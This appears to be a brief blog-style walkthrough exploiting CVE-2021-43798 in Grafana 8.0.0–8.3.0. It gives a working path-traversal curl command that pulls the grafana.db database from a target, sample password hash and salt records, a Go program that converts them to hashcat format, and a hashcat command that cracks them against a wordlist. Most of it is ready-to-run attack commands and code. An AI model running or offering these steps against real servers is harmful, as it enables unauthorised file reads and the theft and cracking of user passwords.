干就完啦

坚持就是胜利

CVE-2021-43798

Affected versions: Grafana 8.0.0 - 8.3.0

$ curl -o grafana.db --path-as-is http://10.9.49.22:3000/public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db
$ sqlite3 grafana.db
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite> .tables
alert                       login_attempt            
alert_configuration         migration_log            
alert_instance              ngalert_configuration    
alert_notification          org                      
alert_notification_state    org_user                 
alert_rule                  playlist                 
alert_rule_tag              playlist_item            
alert_rule_version          plugin_setting           
annotation                  preferences              
annotation_tag              quota                    
api_key                     server_lock              
cache_data                  session                  
dashboard                   short_url                
dashboard_acl               star                     
dashboard_provisioning      tag                      
dashboard_snapshot          team                     
dashboard_tag               team_member              
dashboard_version           temp_user                
data_source                 test_data                
kv_store                    user                     
library_element             user_auth                
library_element_connection  user_auth_token          

Create the file passwordsalt.txt with one `<hex hash>|<salt>` record per line (the fields are separated by a single `|`):

e21680070fb3a72d8cac29819eb74ddbee669a9d362dea5c4674d8287e4a1df22424fcdd00ab0cc8230d4249296adc2adca8|NcgfTdzwPc
18e6160a5e7e03a7dea259195b27543c2d1b515e4490867c73ffb6214d08f77163ecc0f58321a40deb300ec563c15a327733|13CdHYK4Xl
20ae2e2828c004ef4638f6d490a23aa9956cc4bfeb1db60abd18930f97099782037c6861518b466e20addc36dfda5f564d78|bhhVgTns9o

grafana-hashcat.go

Create the file grafana-hashcat.go with the following contents:

package main

import (
	"bufio"
	"encoding/base64"
	"encoding/hex"
	"fmt"
	"os"
	"strings"
)

// tohashes renders one credential record as a hashcat-style line of the form
// "sha256:10000:<base64 salt>:<base64 hash>". password is the hex-encoded
// digest and salt is the raw salt string; both are re-encoded with standard
// (padded) base64. The iteration count 10000 is fixed in the output.
//
// A malformed hex string is reported by returning a message that starts with
// "Error decoding hex:" instead of a hash line, so a caller that writes the
// result straight to its output will emit a bogus line rather than fail —
// check the prefix if that matters.
func tohashes(password, salt string) string {
	digest, decodeErr := hex.DecodeString(password)
	if decodeErr != nil {
		return "Error decoding hex: " + decodeErr.Error()
	}
	enc := base64.StdEncoding
	return "sha256:10000:" + enc.EncodeToString([]byte(salt)) + ":" + enc.EncodeToString(digest)
}

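// main converts the records in passwordsalt.txt (read from the working
// directory) and exits non-zero when the file cannot be opened or read.
// Hash lines go to stdout only; every diagnostic goes to stderr, so stdout
// can be redirected straight into the file used by the next step without
// error messages being mixed into it.
func main() {
	if !convert("passwordsalt.txt") {
		os.Exit(1)
	}
}

// convert reads path line by line, expecting "<hex hash>|<salt>" records, and
// prints the hashcat-formatted line for each valid record to stdout.
// Malformed lines (wrong number of separators, undecodable hex) are reported
// on stderr and skipped. It returns false if the file could not be opened or
// a read error occurred, true otherwise.
func convert(path string) bool {
	file, err := os.Open(path)
	if err != nil {
		fmt.Fprintln(os.Stderr, "Error opening file:", err)
		return false
	}
	defer file.Close()

	scanner := bufio.NewScanner(file)
	for scanner.Scan() {
		line := scanner.Text()
		// Exactly one separator is required: "a|b|c" and "a" are rejected alike.
		hash, salt, found := strings.Cut(line, "|")
		if !found || strings.Contains(salt, "|") {
			fmt.Fprintln(os.Stderr, "Invalid line:", line)
			continue
		}
		// Validate the hex up front so a decoding failure is reported on
		// stderr instead of being printed as a bogus hash line.
		if _, err := hex.DecodeString(hash); err != nil {
			fmt.Fprintln(os.Stderr, "Invalid line:", line, "-", err)
			continue
		}
		fmt.Println(tohashes(hash, salt))
	}

	if err := scanner.Err(); err != nil {
		fmt.Fprintln(os.Stderr, "Error reading file:", err)
		return false
	}
	return true
}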

Run the converter; it prints one hashcat-formatted line per input record to stdout:

> go run .\grafana-hashcat.go
sha256:10000:TmNnZlRkendQYw==:4haABw+zpy2MrCmBnrdN2+5mmp02LepcRnTYKH5KHfIkJPzdAKsMyCMNQkkpatwq3Kg=
sha256:10000:MTNDZEhZSzRYbA==:GOYWCl5+A6feolkZWydUPC0bUV5EkIZ8c/+2IU0I93Fj7MD1gyGkDeswDsVjwVoydzM=
sha256:10000:YmhoVmdUbnM5bw==:IK4uKCjABO9GOPbUkKI6qZVsxL/rHbYKvRiTD5cJl4IDfGhhUYtGbiCt3Dbf2l9WTXg=

hashcat

> hashcat.exe -m 10900 hashes.txt rockyou.txt -o o.txt

参考: https://vulncheck.com/blog/grafana-cve-2021-43798